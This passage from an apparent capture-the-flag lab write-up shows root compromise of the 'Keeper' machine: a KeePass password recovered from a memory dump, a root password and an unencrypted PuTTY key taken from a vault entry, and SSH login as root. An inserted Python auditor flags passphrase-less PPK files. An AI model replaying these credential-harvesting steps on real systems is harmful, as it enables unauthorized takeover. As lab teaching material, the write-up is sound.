Privilege Escalation
As shown previously, I was able to successfully mine a password from the KeePass memory dump file using an exploit PoC. However, the result still appeared incomplete, as the first and second characters were unidentified.
As the identified part of the password appears to be a phrase, I decided to look it up on Google.
Google’s auto-completion reveals that it might be: rødgrød med fløde
It works.
The password for the KeePass DB file is: rødgrød med fløde
There is a Network credential for the root user: F4><3K0nd!
lnorgaard@keeper:~$ su root
password:
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ sshpass -p 'F4><3K0nd!' ssh root@keeper.htb
Permission denied, please try again.
The credential doesn’t seem to work.
Putty
Looking further into the entry, there is a note attached to it. Based on its context, the note appears to be meant for Putty. Searching for its content online reveals that it is the body of a PPK file, which is Putty's own key file format.
puttygen
Another online resource revealed that an SSH key pair can be extracted from a PPK file using a tool named puttygen, which is part of the putty-tools suite.
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ sudo apt install putty-tools
Installing the putty-tools suite.
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ cat ssh.ppk
putty-user-key-file-3: ssh-rsa
encryption: none
comment: rsa-key-20230519
public-lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
private-lines: 14
(private-key lines omitted)
private-mac: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0
I then saved the PPK content to a file, ssh.ppk.
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ puttygen ssh.ppk -O private-openssh -o id_rsa.root
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ puttygen ssh.ppk -O public-openssh -o id_rsa.root.public
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ chmod 600 id_rsa.root
Extracting the SSH key pair from the ssh.ppk file.
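The PPK file shown above and the puttygen conversion that follows it, as an added example that is not part of the writeup and not PuTTY's own code: a small Python auditor that parses the PPK header format (v2 and v3, lower- or mixed-case header names, the Argon2 headers of an encrypted v3 file included), reports the key type and size from the public-lines blob, flags "encryption: none" (the condition that turned the note in the KeePass entry into a ready-to-use root key), and reproduces the line that puttygen -O public-openssh writes. The public half embedded in the sample is the one printed on the page; the private-lines and private-mac values are constructed placeholders, so the sample is not a usable key and the MAC is not verified.

```python
"""Audit a PuTTY .ppk file: parse its headers, flag a private key stored without
a passphrase (encryption: none) and emit the OpenSSH public-key line that
`puttygen -O public-openssh` would produce. Added example, not PuTTY's code."""
import base64
import re
import struct

# Header, comment and public-lines copied from the page; the private-lines and
# private-mac values are CONSTRUCTED placeholders, so this is not a usable key
# and the MAC is not checked here.
SAMPLE_PPK = """\
putty-user-key-file-3: ssh-rsa
encryption: none
comment: rsa-key-20230519
public-lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
private-lines: 1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
private-mac: 0000000000000000000000000000000000000000000000000000000000000000
"""


def parse_ppk(text):
    """Return the headers as a lower-cased dict; a '*-lines: N' header is
    followed by N base64 lines, joined into one blob. Unknown headers (the
    Argon2 ones of an encrypted v3 file) are kept as-is."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    if not lines or not lines[0].lower().startswith("putty-user-key-file-"):
        raise ValueError("not a PuTTY key file")
    fields, i = {}, 0
    while i < len(lines):
        name, sep, value = lines[i].partition(":")
        if not sep or not re.fullmatch(r"[A-Za-z0-9-]+", name):
            raise ValueError(f"line {i + 1}: expected a 'Name: value' header")
        name, value, i = name.lower(), value.strip(), i + 1
        if name.endswith("-lines"):
            count = int(value)
            if len(lines) - i < count:
                raise ValueError(f"{name}: declared {count} lines, file truncated")
            fields[name], i = "".join(lines[i:i + count]), i + count
        else:
            fields[name] = value
    fields["version"] = int(lines[0].split(":")[0].rsplit("-", 1)[1])
    for required in ("encryption", "public-lines", "private-lines", "private-mac"):
        if required not in fields:
            raise ValueError(f"missing {required} header")
    return fields


def parse_ssh_rsa_public(blob_b64):
    """Decode the SSH wire-format blob: string 'ssh-rsa', mpint e, mpint n."""
    data, pos = base64.b64decode(blob_b64), 0

    def read_string():
        nonlocal pos
        if pos + 4 > len(data):
            raise ValueError("truncated public key blob")
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        chunk = data[pos + 4:pos + 4 + length]
        if len(chunk) != length:
            raise ValueError("truncated public key blob")
        pos += 4 + length
        return chunk

    key_type = read_string().decode("ascii")
    if key_type != "ssh-rsa":
        raise ValueError(f"unsupported key type {key_type!r}")
    e = int.from_bytes(read_string(), "big")
    n = int.from_bytes(read_string(), "big")
    if pos != len(data):
        raise ValueError("trailing bytes in public key blob")
    return key_type, e, n


def to_openssh_public(ppk):
    """Same line `puttygen -O public-openssh` writes: the joined public-lines
    blob is already the OpenSSH base64 payload, so no re-encoding is needed."""
    key_type, _, _ = parse_ssh_rsa_public(ppk["public-lines"])
    return f"{key_type} {ppk['public-lines']} {ppk.get('comment', '')}".rstrip()


def audit(text):
    """Summarise a PPK file for review: key type, size and passphrase status."""
    ppk = parse_ppk(text)
    key_type, e, n = parse_ssh_rsa_public(ppk["public-lines"])
    return {
        "version": ppk["version"],
        "type": key_type,
        "bits": n.bit_length(),
        "exponent": e,
        "comment": ppk.get("comment", ""),
        # 'none' means the private half sits in the clear: whoever can read the
        # file (or the KeePass note holding it) can use the key directly.
        "encrypted": ppk["encryption"].lower() != "none",
    }
```

Running audit(open(path).read()) over the .ppk files found in a password manager export or on a shared drive gives one dict per key; any entry with "encrypted": False is a private key usable by anyone who can read the file, which is exactly what made the note in this KeePass entry worth a root shell, and should be regenerated with a passphrase rather than left in a note.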
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ ssh root@keeper.htb -i ./id_rsa.root
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)
* documentation: https://help.ubuntu.com
* management: https://landscape.canonical.com
* support: https://ubuntu.com/advantage
failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
You have new mail.
last login: Tue Aug 8 19:00:06 2023 from 10.10.14.41
root@keeper:~# whoami
root
root@keeper:~# hostname
keeper
root@keeper:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.227 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 dead:beef::250:56ff:feb9:58e5 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:58e5 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:58:e5 txqueuelen 1000 (Ethernet)
RX packets 1169917 bytes 179693986 (179.6 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1488508 bytes 1017085094 (1.0 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 2567624 bytes 371612836 (371.6 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2567624 bytes 371612836 (371.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
System Level Compromised